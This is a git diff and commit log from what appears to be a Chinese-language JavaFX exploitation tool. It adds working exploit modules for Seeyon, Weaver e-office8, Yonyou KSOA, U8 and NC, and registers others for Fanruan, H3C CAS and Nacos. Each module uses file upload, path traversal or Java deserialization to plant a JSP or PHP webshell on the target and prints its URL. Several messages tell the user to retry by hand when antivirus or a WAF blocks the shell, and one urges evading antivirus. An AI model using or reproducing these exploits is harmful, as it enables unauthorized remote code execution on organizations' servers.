+                Platform.runLater(() -> {
+                    textArea.appendText("\n 疑似杀软查杀 请手动复现");
+                });
+                return false;
+            }
+        }else {
+            Platform.runLater(() -> {
+                textArea.appendText("\n seeyonoa_seeyonreport_upload-RCE-漏洞不存在 (出现误报请联系作者)");
+            });
+            return false;
+        }
+    }
+
+    private Boolean shell(String url, TextArea textArea){
+        HashMap<String, String> head = new HashMap<>();
+        head.put("Content-Type", "text/xml;charset=UTF-8");
+        String payload = "{\"__CONTENT__\": \"" + shell.readFile(shell.Jsppath).replace("\"","\\\"") + "\", \"__CHARSET__\": \"UTF-8\"}";
+        Response post = HttpTools.post(url + "/seeyonreport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../WebReport/nishidazhu.svg.jsp", payload, head, "utf-8");
+
+        if(post.getCode() == 200){
+            Response response = HttpTools.get(url + "/seeyonreport/WebReport/nishizhu.svg.jsp", new HashMap<String, String>(), "utf-8");
+            if (response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+                Platform.runLater(() -> {
+                    textArea.appendText("\n 漏洞存在 webshell文件写入成功\n " + url + "/seeyonreport/WebReport/nishidazhu.svg.jsp");
+                });
+                return true;
+            }else {
+                Platform.runLater(() -> {
+                    textArea.appendText("\n 疑似杀软查杀 请手动复现");
+                });
+                return false;
+            }
+        }else {
+            Platform.runLater(() -> {
+                textArea.appendText("\n 疑似杀软查杀 请手动复现");
+            });
+            return false;
+        }
+    }
+
+}
--- a/src/main/java/exp/oa/weaveroa/weaveroa_eoffice8_upload.java
+++ b/src/main/java/exp/oa/weaveroa/weaveroa_eoffice8_upload.java
@@ -0,0 +1,107 @@
+package exp.oa.weaveroa;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.util.HashMap;
+
+public class weaveroa_eoffice8_upload implements Exploitlnterface {
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        Boolean pay1 = pay1(url, textArea);
+        return pay1;
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        Boolean shell = shell(url, textArea);
+        return shell;
+    }
+
+    private Boolean pay1(String url, TextArea textArea) {
+        HashMap<String, String> head = new HashMap<>();
+        head.put("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryCRMgP7QyN0VotswZ");
+        String upload = "------WebKitFormBoundaryCRMgP7QyN0VotswZ\n" +
+                "Content-Disposition: form-data; name=\"file\"; filename=\"nishizhu.php4\"\n" +
+                "Content-Type: application/octet-stream\n" +
+                "\n" +
+                shell.readFile(shell.Testpath) + "\n" +
+                "------WebKitFormBoundaryCRMgP7QyN0VotswZ--";
+
+        Response post = HttpTools.post(url + "/webservice/upload.php", upload, head, "utf-8");
+
+
+        try {
+            String uri1 = post.getText().split("\\*")[0];
+            String uri2 = post.getText().split("\\*")[1];
+
+
+            String geturl = url + "/attachment/" + uri1 + "/" + uri2;
+            Response response = HttpTools.get(geturl, new HashMap<String, String>(), "utf-8");
+            if (response.getCode() == 200 && response.getText().contains(shell.test_payload)) {
+                Platform.runLater(() -> {
+                    textArea.appendText(
+                            "\n 漏洞存在 测试文件写入成功 \n " + geturl
+                    );
+                });
+                return true;
+            } else {
+                Platform.runLater(() -> {
+                    textArea.appendText(
+                            "\n weaveroa-eoffice8-upload-RCE - 漏洞不存在 (出现误报请联系作者)"
+                    );
+                });
+                return false;
+            }
+        } catch (Exception e) {
+            Platform.runLater(() -> {
+                textArea.appendText(
+                        "\n weaveroa-eoffice8-upload-RCE - 漏洞不存在 (出现误报请联系作者)"
+                );
+            });
+            return false;
+        }
+
+
+    }
+
+    private Boolean shell(String url, TextArea textArea) {
+        HashMap<String, String> head = new HashMap<>();
+        head.put("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryCRMgP7QyN0VotswZ");
+        String upload = "------WebKitFormBoundaryCRMgP7QyN0VotswZ\n" +
+                "Content-Disposition: form-data; name=\"file\"; filename=\"nishizhuda.php4\"\n" +
+                "Content-Type: application/octet-stream\n" +
+                "\n" +
+                shell.readFile(shell.Phppath) + "\n" +
+                "------WebKitFormBoundaryCRMgP7QyN0VotswZ--";
+
+        Response post = HttpTools.post(url + "/webservice/upload.php", upload, head, "utf-8");
+
+        String uri1 = post.getText().split("\\*")[0];
+        String uri2 = post.getText().split("\\*")[1];
+
+        String geturl = url + "/attachment/" + uri1 + "/" + uri2;
+        Response response = HttpTools.get(geturl, new HashMap<String, String>(), "utf-8");
+        if (response.getCode() == 200 && response.getText().contains(shell.test_payload)) {
+            Platform.runLater(() -> {
+                textArea.appendText(
+                        "\n 漏洞存在 shell文件写入成功 \n " + geturl
+                );
+            });
+            return true;
+        } else {
+            Platform.runLater(() -> {
+                textArea.appendText(
+                        "\n 疑似waf查杀，请手动测试"
+                );
+            });
+            return false;
+        }
+    }
+
+
+}
--- a/src/main/java/exp/oa/yongyou/yongyou_KSOA_Attachmentupload.java
+++ b/src/main/java/exp/oa/yongyou/yongyou_KSOA_Attachmentupload.java
@@ -0,0 +1,60 @@
+package exp.oa.yongyou;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.util.HashMap;
+
+
+public class yongyou_KSOA_Attachmentupload implements Exploitlnterface {
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        return att(url, textArea);
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        return shell(url, textArea);
+    }
+
+    private Boolean att(String url,TextArea textArea){
+        HashMap<String,String> head = new HashMap<>();
+        head.put("Content-Disposition","application/x-msdownload; ");
+        Response post = HttpTools.post(url + "/servlet/com.sksoft.bill.Attachment?action=read&&attachid=../../../../nishizhu.txt", shell.test_payload, head, "utf-8");
+        Response response = HttpTools.get(url + "/pictures/nishizhu.txt", new HashMap<String, String>(), "utf-8");
+        if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+            Platform.runLater(()->{
+                textArea.appendText("\n 漏洞存在 测试文件写入成功\n" + url + "/nishizhu.txt");
+            });
+            return true;
+        }else {
+            Platform.runLater(()->{
+                textArea.appendText("\n yongyou_KSOA_Attachmentupload-RCE-漏洞不存在 (出现误报请联系作者)");
+            });
+            return false;
+        }
+    }
+
+    private Boolean shell(String url,TextArea textArea){
+        HashMap<String,String> head = new HashMap<>();
+        head.put("Content-Type","multipart/form-data; boundary=---------------------------122739796041499160471980406311");
+        Response post = HttpTools.post(url + "/servlet/com.sksoft.bill.Attachment?action=read&&attachid=../../../../nishizhu.jsp", shell.readFile(shell.Jsppath), head, "utf-8");
+        Response response = HttpTools.get(url + "/pictures/nishizhu.jsp", new HashMap<String, String>(), "utf-8");
+        if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+            Platform.runLater(()->{
+                textArea.appendText("\n 漏洞存在 webshell文件写入成功\n" + url + "/nishizhu.jsp");
+            });
+            return true;
+        }else {
+            Platform.runLater(()->{
+                textArea.appendText("\n waf拦截！！！请手动复现！！！");
+            });
+            return false;
+        }
+    }
+
+}
--- a/src/main/java/exp/oa/yongyou/yongyou_U8_AppProxy.java
+++ b/src/main/java/exp/oa/yongyou/yongyou_U8_AppProxy.java
@@ -0,0 +1,87 @@
+package exp.oa.yongyou;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.util.HashMap;
+
+public class yongyou_U8_AppProxy implements Exploitlnterface {
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        return att(url,textArea);
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        return shell(url,textArea);
+    }
+
+    private Boolean att(String url, TextArea textArea){
+        HashMap<String,String> head = new HashMap<>();
+        head.put("Content-Type","multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b");
+
+        String upload = "--59229605f98b8cf290a7b8908b34616b\n" +
+                "Content-Disposition: form-data; name=\"file\"; filename=\"1.jsp\"\n" +
+                "Content-Type: image/png\n" +
+                "\n" +
+                "<% out.println(\"" + shell.test_payload + "\");%>\n" +
+                "--59229605f98b8cf290a7b8908b34616b--";
+
+        Response post = HttpTools.post(url + "/U8AppProxy?gnid=myinfo&id=saveheader&zydm=..%2F..%2Fhello_U8", upload, head, "utf-8");
+
+        Response response = HttpTools.get(url + "/hello_U8.jsp", new HashMap<String, String>(), "utf-8");
+
+        if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+            Platform.runLater(() -> {
+                textArea.appendText(
+                        "\n 漏洞存在，测试文件写入成功 " + url + "/hello_U8.jsp"
+                );
+            });
+            return true;
+        }else {
+            Platform.runLater(() -> {
+                textArea.appendText(
+                        "\n yongyou_U8_AppProxy-upload-RCE - 漏洞不存在 (出现误报请联系作者)"
+                );
+            });
+            return false;
+        }
+    }
+
+    private Boolean shell(String url, TextArea textArea){
+        HashMap<String,String> head = new HashMap<>();
+        head.put("Content-Type","multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b");
+
+        String upload = "--59229605f98b8cf290a7b8908b34616b\n" +
+                "Content-Disposition: form-data; name=\"file\"; filename=\"1.jsp\"\n" +
+                "Content-Type: image/png\n" +
+                "\n" +
+                "<% out.println(\"" + shell.readFile(shell.Jsppath) + "\");%>\n" +
+                "--59229605f98b8cf290a7b8908b34616b--";
+
+        Response post = HttpTools.post(url + "/U8AppProxy?gnid=myinfo&id=saveheader&zydm=..%2F..%2Fhello_U8", upload, head, "utf-8");
+
+        Response response = HttpTools.get(url + "/hello_U8.jsp", new HashMap<String, String>(), "utf-8");
+
+        if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+            Platform.runLater(() -> {
+                textArea.appendText(
+                        "\n 漏洞存在，webshell文件写入成功 " + url + "/hello_U8.jsp"
+                );
+            });
+            return true;
+        }else {
+            Platform.runLater(()->{
+                textArea.appendText("\n waf拦截！！！请手动复现！！！");
+            });
+            return false;
+        }
+    }
+
+
+
+}
--- a/src/main/java/exp/oa/yongyou/yongyou_chajet_upload.java
+++ b/src/main/java/exp/oa/yongyou/yongyou_chajet_upload.java
@@ -35,7 +35,7 @@ public class yongyou_chajet_upload implements Exploitlnterface {
        Response post = HttpTools.post(url + "/tplus/SM/SetupAccount/Upload.aspx?preload=1", fir_post, this.headers, "utf-8");
        if (post.getCode() == 200) {
            Response response = HttpTools.get(url + "/tplus/SM/SetupAccount/images/" + filename, new HashMap<String, String>(), "utf-8");
-            if (response.getText().contains(shell.test_payload)) {
+            if (response.getText() != "" && response.getText().contains(shell.test_payload)) {
                Platform.runLater(() -> {
                    textArea.appendText("\n 漏洞存在，测试文件写入成功 \n地址为：" + url + "/tplus/SM/SetupAccount/images/" + filename);
                });
--- a/src/main/java/exp/oa/yongyou/yongyou_nc_uploadServlet.java
+++ b/src/main/java/exp/oa/yongyou/yongyou_nc_uploadServlet.java
@@ -0,0 +1,122 @@
+package exp.oa.yongyou;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.io.ObjectOutputStream;
+import java.io.OutputStream;
+import java.net.HttpURLConnection;
+import java.util.HashMap;
+import java.util.Map;
+
+
+public class yongyou_nc_uploadServlet implements Exploitlnterface {
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        return att(url, textArea);
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        return shell(url, textArea);
+    }
+
+    private Boolean att(String url, TextArea textArea) {
+        try {
+            HashMap<String, String> head = new HashMap<>();
+            head.put("Content-Type", "multipart/form-data;");
+            HttpURLConnection coon = HttpTools.getCoon(url + "/servlet/UploadServlet");
+            coon.setRequestMethod("POST");
+            coon.setDoOutput(true);
+            coon.setDoInput(true);
+            coon.setUseCaches(false);
+
+            for (String key : head.keySet()) {
+                coon.setRequestProperty(key, head.get(key));
+            }
+            OutputStream outputStream = coon.getOutputStream();
+            ObjectOutputStream out = new ObjectOutputStream(outputStream);
+            Map<String, Object> metaInfo = new HashMap<String, Object>();
+            metaInfo.put("TARGET_FILE_PATH", "webapps/nc_web");
+            metaInfo.put("FILE_NAME", "nishizhu.txt");
+            out.writeObject(metaInfo);
+            outputStream.write(shell.test_payload.getBytes());
+            out.flush();
+            out.close();
+            outputStream.close();
+            HttpTools.getResponse(coon, "utf-8");
+
+            Response get_res = HttpTools.get(url + "/nishizhu.txt", new HashMap<String, String>(), "utf-8");
+            if (get_res.getCode() == 200 && get_res.getText().contains(shell.test_payload)) {
+                Platform.runLater(() -> {
+                    textArea.appendText("\n 反序列化漏洞存在 txt文件写入成功 \n" + url + "/nishizhu.txt");
+                });
+                return true;
+            } else {
+                Platform.runLater(() -> {
+                    textArea.appendText("\n nc_FileuploadServlet-RCE-漏洞不存在 (出现误报请联系作者)");
+                });
+                return false;
+            }
+
+        } catch (Exception e) {
+            Platform.runLater(() -> {
+                textArea.appendText("\n nc_FileuploadServlet-RCE-漏洞不存在 (出现误报请联系作者)");
+                textArea.appendText("\n 连接异常！！！");
+            });
+        }
+        return false;
+    }
+
+    private Boolean shell(String url, TextArea textArea) {
+
+        try {
+            HashMap<String, String> head = new HashMap<>();
+            head.put("Content-Type", "multipart/form-data;");
+            HttpURLConnection coon = HttpTools.getCoon(url + "/servlet/UploadServlet");
+            coon.setRequestMethod("POST");
+            coon.setDoOutput(true);
+            coon.setDoInput(true);
+            coon.setUseCaches(false);
+
+            for (String key : head.keySet()) {
+                coon.setRequestProperty(key, head.get(key));
+            }
+            OutputStream outputStream = coon.getOutputStream();
+            ObjectOutputStream out = new ObjectOutputStream(outputStream);
+            Map<String, Object> metaInfo = new HashMap<String, Object>();
+            metaInfo.put("TARGET_FILE_PATH", "webapps/nc_web");
+            metaInfo.put("FILE_NAME", "nishizhu.jsp");
+            out.writeObject(metaInfo);
+            outputStream.write(shell.readFile(shell.Jsppath).getBytes());
+            out.flush();
+            out.close();
+            outputStream.close();
+            HttpTools.getResponse(coon, "utf-8");
+
+            Response get_res = HttpTools.get(url + "/nishizhu.jsp", new HashMap<>(), "utf-8");
+            if (get_res.getCode() == 200 && get_res.getText().contains(shell.test_payload)) {
+                Platform.runLater(() -> {
+                    textArea.appendText("\n 反序列化漏洞存在 shell文件写入成功 \n" + url + "/nishizhu.jsp");
+                });
+                return true;
+            } else {
+                Platform.runLater(() -> {
+                    textArea.appendText("\n shell被查杀 请免杀！！！！！！！！");
+                });
+                return false;
+            }
+
+        } catch (Exception e) {
+            Platform.runLater(() -> {
+                textArea.appendText("\n 连接异常！！！");
+            });
+        }
+        return false;
+    }
+
+}
--- a/src/main/java/utils/Kinds_Exp.java
+++ b/src/main/java/utils/Kinds_Exp.java
@@ -1,17 +1,18 @@
 package utils;

 import core.Exploitlnterface;
+import exp.cms.nacos_Creatuser;
+import exp.equipment.h3c.cas_cvm_upload;
 import exp.equipment.hikvision.hik_applyCT_fastjson;
 import exp.equipment.qianxin.ngfw_waf_router;
 import exp.equipment.wangyu.Leadsec_ACM_account;
 import exp.middleware.iis.iis_put_rce;
+import exp.oa.fanruan.fanruan_save_svg;
 import exp.oa.landrayoa.landray_datajson;
+import exp.oa.landrayoa.landray_fileupload_sysSearch;
 import exp.oa.landrayoa.landray_sysSearchMain;
 import exp.oa.landrayoa.landray_treexmlTmpl;
-import exp.oa.seeyonoa.seeyonoa_ajaxBypass;
-import exp.oa.seeyonoa.seeyonoa_htmlofficeservlet;
-import exp.oa.seeyonoa.seeyonoa_main_log4j2;
-import exp.oa.seeyonoa.seeyonoa_wpsAssistServlet;
+import exp.oa.seeyonoa.*;
 import exp.oa.tongdaoa.tongdaoa_apiali;
 import exp.oa.tongdaoa.tongdaoa_getdata;
 import exp.oa.wanhuoa.wanhu_DocumentEdit;
@@ -19,15 +20,7 @@ import exp.oa.wanhuoa.wanhuoa_OfficeServer;
 import exp.oa.wanhuoa.wanhuoa_Officeserverservlet;
 import exp.oa.wanhuoa.wanhuoa_fileUploadController;
 import exp.oa.wanhuoa.wanhuoa_smartUpload;
-import exp.oa.weaveroa.weaveroa_BshServlet;
-import exp.oa.weaveroa.weaveroa_KtreeUploadAction;
-import exp.oa.weaveroa.weaveroa_WorkflowServiceXml;
-import exp.oa.weaveroa.weaveroa_doExecl;
-import exp.oa.weaveroa.weaveroa_eoffice10_OfficeServer;
-import exp.oa.weaveroa.weaveroa_mobile6_sqlli;
-import exp.oa.weaveroa.weaveroa_office_UploadFile;
-import exp.oa.weaveroa.weaveroa_page_uploadOperation;
-import exp.oa.weaveroa.weaveroa_workrelate_uploadOperation;
+import exp.oa.weaveroa.*;
 import exp.oa.yongyou.*;

 import java.util.ArrayList;
@@ -70,6 +63,7 @@ public class Kinds_Exp {
    kindList.add("OA");
    kindList.add("安全设备");
    kindList.add("中间件");
+    kindList.add("CMS");
    return kindList;
  }

@@ -82,6 +76,7 @@ public class Kinds_Exp {
    oa.add("万户-OA");
    oa.add("致远-OA");
    oa.add("通达-OA");
+    oa.add("帆软-OA");
    return FXCollections.observableArrayList(oa);
  }

@@ -96,12 +91,19 @@ public class Kinds_Exp {
  public static ObservableList<String> equipment() {
    ArrayList<String> equipment = new ArrayList<>();
    equipment.add("海康");
+    equipment.add("H3C");
    equipment.add("深信服");
    equipment.add("网御星云");
    equipment.add("奇安信");
    return FXCollections.observableArrayList(equipment);
  }

+  public static ObservableList<String> cms() {
+    ArrayList<String> equipment = new ArrayList<>();
+    equipment.add("Alibaba");
+    return FXCollections.observableArrayList(equipment);
+  }
+
  /*---------------------OA系列-------------------------*/

  //泛微oa
@@ -114,6 +116,7 @@ public class Kinds_Exp {
    expList.add("e-cology BshServlet-RCE");
    expList.add("e-cology KreeUploadAction-RCE");
    expList.add("e-office logo_UploadFile.php-RCE");
+    expList.add("e-office8 upload.php-RCE");
    expList.add("e-office10 OfficeServer.php-RCE");
    expList.add("e-office doexcel.php-RCE");
    expList.add("e-mobile_6.6 messageType.do-SQlli");
@@ -127,6 +130,14 @@ public class Kinds_Exp {
    expList.add("landray_sysSearchMain.do-RCE");
    expList.add("landray_treexmlTmpl-RCE");
    expList.add("landray_datajson-RCE");
+    expList.add("landray_fileupload_sysSearch-RCE");
+    return FXCollections.observableArrayList(expList);
+  }
+
+  public ObservableList<String> fanruan(){
+    expList = new ArrayList<>();
+    expList.add("All");
+    expList.add("fanruan-design_save_svg-RCE");
    return FXCollections.observableArrayList(expList);
  }

@@ -138,8 +149,11 @@ public class Kinds_Exp {
    expList.add("NC_bsh.servlet.BshServlet-RCE");
    expList.add("NC_NCFindWeb-Directory");
    expList.add("NC_FileReceiveServlet-RCE");
+    expList.add("NC_UploadServlet-RCE");
    expList.add("GRP_U8_UploadFileData-RCE");
+    expList.add("GRP_U8_AppProxy-RCE");
    expList.add("KSOA_ImageUpload-RCE");
+    expList.add("KSOA_Attachmentupload-RCE");
    return FXCollections.observableArrayList(expList);
  }

@@ -160,9 +174,11 @@ public class Kinds_Exp {
    expList = new ArrayList<>();
    expList.add("All");
    expList.add("seeyonoa_main_log4j2-RCE");
+    expList.add("seeyonoa_seeyonreport_upload-RCE");
    expList.add("seeyonoa_wpsAssisServlet-RCE");
    expList.add("seeyonoa_htmlofficeservlet-RCE");
    expList.add("seeyonoa_ajaxBypass-RCE");
+    expList.add("seeyon_testsqli-RCE");
    return FXCollections.observableArrayList(expList);
  }

@@ -196,6 +212,13 @@ public class Kinds_Exp {
    return FXCollections.observableArrayList(expList);
  }

+  public ObservableList<String> h3c() {
+    expList = new ArrayList<>();
+    expList.add("All");
+    expList.add("cas_cvm云计算管理平台-RCE");
+    return FXCollections.observableArrayList(expList);
+  }
+
  //奇安信
  public ObservableList<String> qianxin() {
    expList = new ArrayList<>();
@@ -211,6 +234,15 @@ public class Kinds_Exp {
    return FXCollections.observableArrayList(expList);
  }

+  /*---------------------CMS-------------------------*/
+
+  public ObservableList<String> Alibaba() {
+    expList = new ArrayList<>();
+    expList.add("All");
+    expList.add("nacos任意用户添加");
+    return FXCollections.observableArrayList(expList);
+  }
+
  public ObservableList<String> defaultList() {
    expList = new ArrayList<>();
    expList.add("All");
@@ -242,6 +274,15 @@ public class Kinds_Exp {
    }else if(vulName.contains("e-office doexcel.php-RCE")){
      ei = new weaveroa_doExecl();
    }
+    else if(vulName.contains("e-office8 upload.php-RCE")){
+      ei = new weaveroa_eoffice8_upload();
+    }
+
+
+    else if (vulName.contains("fanruan-design_save_svg-RCE")) {
+      //帆软
+      ei = new fanruan_save_svg();
+    }

    else if (vulName.contains("chajet_upload-RCE")) {
      //用友
@@ -256,15 +297,22 @@ public class Kinds_Exp {
      ei = new yongyou_grp_UploadFileData();
    }else if(vulName.contains("KSOA_ImageUpload-RCE")){
      ei = new yongyou_KSOA_imageupload();
-    }
+    }else if(vulName.contains("NC_UploadServlet-RCE")){
+      ei = new yongyou_nc_uploadServlet();
+    } else if (vulName.contains("GRP_U8_AppProxy-RCE")) {
+      ei = new yongyou_U8_AppProxy();
+    } else if (vulName.contains("KSOA_Attachmentupload-RCE")) {
+      ei = new yongyou_KSOA_Attachmentupload();

-    else if (vulName.contains("landray_sysSearchMain.do-RCE")) {
+    } else if (vulName.contains("landray_sysSearchMain.do-RCE")) {
      //蓝凌
      ei = new landray_sysSearchMain();
    } else if (vulName.contains("landray_treexmlTmpl-RCE")) {
      ei = new landray_treexmlTmpl();
    } else if (vulName.contains("landray_datajson-RCE")) {
      ei = new landray_datajson();
+    } else if (vulName.contains("landray_fileupload_sysSearch-RCE")) {
+      ei = new landray_fileupload_sysSearch();
    }

    else if(vulName.contains("wanhu_OfficeServer-RCE")){
@@ -289,6 +337,10 @@ public class Kinds_Exp {
      ei = new seeyonoa_htmlofficeservlet();
    }else if(vulName.contains("seeyonoa_ajaxBypass-RCE")){
      ei = new seeyonoa_ajaxBypass();
+    }else if(vulName.contains("seeyonoa_seeyonreport_upload-RCE")){
+      ei = new seeyonreport_svg_upload();
+    }else if (vulName.contains("seeyon_testsqli-RCE")) {
+      ei = new seeyon_testsqli();
    }

    else if(vulName.contains("tongdaoa_getdata-RCE")){
@@ -315,7 +367,16 @@ public class Kinds_Exp {
    else if(vulName.contains("上网行为管理账号密码泄露_Leadsec_ACM")){
      //网御星云
      ei = new Leadsec_ACM_account();
+    } else if (vulName.contains("cas_cvm云计算管理平台-RCE")) {
+      //h3c
+      ei = new cas_cvm_upload();
    }
+
+    /*-----CMS-----*/
+    else if (vulName.contains("nacos任意用户添加")) {
+      ei = new nacos_Creatuser();
+    }
+
    return ei;
  }
 }
--- a/src/main/java/utils/shell.java
+++ b/src/main/java/utils/shell.java
@@ -42,6 +42,11 @@ public class shell {
 //     public static String dnspath = "./Apt_config/dnslog/dnslog.txt";


+
+//    public static final String open = "notepad ";
+    public static final String open = "open ";
+
+
    //标记内容
    public static final String test_payload = "9df37afc77bdd582d90aefaf4e35c63e";

@@ -179,4 +184,26 @@ public class shell {
        }
        return sb.toString();
    }
+
+
+
+    /*-------------------------------url编码方法---------------------------*/
+
+    public static String gbEncoding(String gbString) {
+        char[] utfBytes = gbString.toCharArray();
+        String unicodeBytes = "";
+
+        for(int i = 0; i < utfBytes.length; ++i) {
+            String hexB = Integer.toHexString(utfBytes[i]);
+            if (hexB.length() <= 2) {
+                hexB = "00" + hexB;
+            }
+
+            unicodeBytes = unicodeBytes + "\\u" + hexB;
+        }
+
+        return unicodeBytes;
+    }
+
+
 }
Author	SHA1	Message	Date
White-hua	d19c72d953	Update README.md	2025-02-12 17:55:03 +08:00
White-hua	0e515402b7	Update README.md	2025-02-12 17:53:52 +08:00
White-hua	8fc4cde744	Update README.md	2025-02-12 17:51:52 +08:00
White-hua	52268c288b	Update README.md	2023-08-13 20:33:36 +08:00
White-hua	417baa786c	Update README.md	2023-08-13 20:31:20 +08:00
White-hua	17962c6b9b	Update README.md	2023-08-13 20:30:29 +08:00
White-hua	ee7412ab87	Merge pull request #14 from dbgee/patch-1 Update cas_cvm_upload.java 文件名校验	2023-03-25 10:11:10 +08:00
dbgee	ec1492c753	Update cas_cvm_upload.java 文件名校验校验漏洞是否利用成功的文件名错误	2023-03-23 10:01:29 +08:00
White-hua	c8877e66da	Update README.md	2023-03-15 11:38:02 +08:00
cdxiaodong	7b104a57db	0day	2023-03-13 00:19:35 +08:00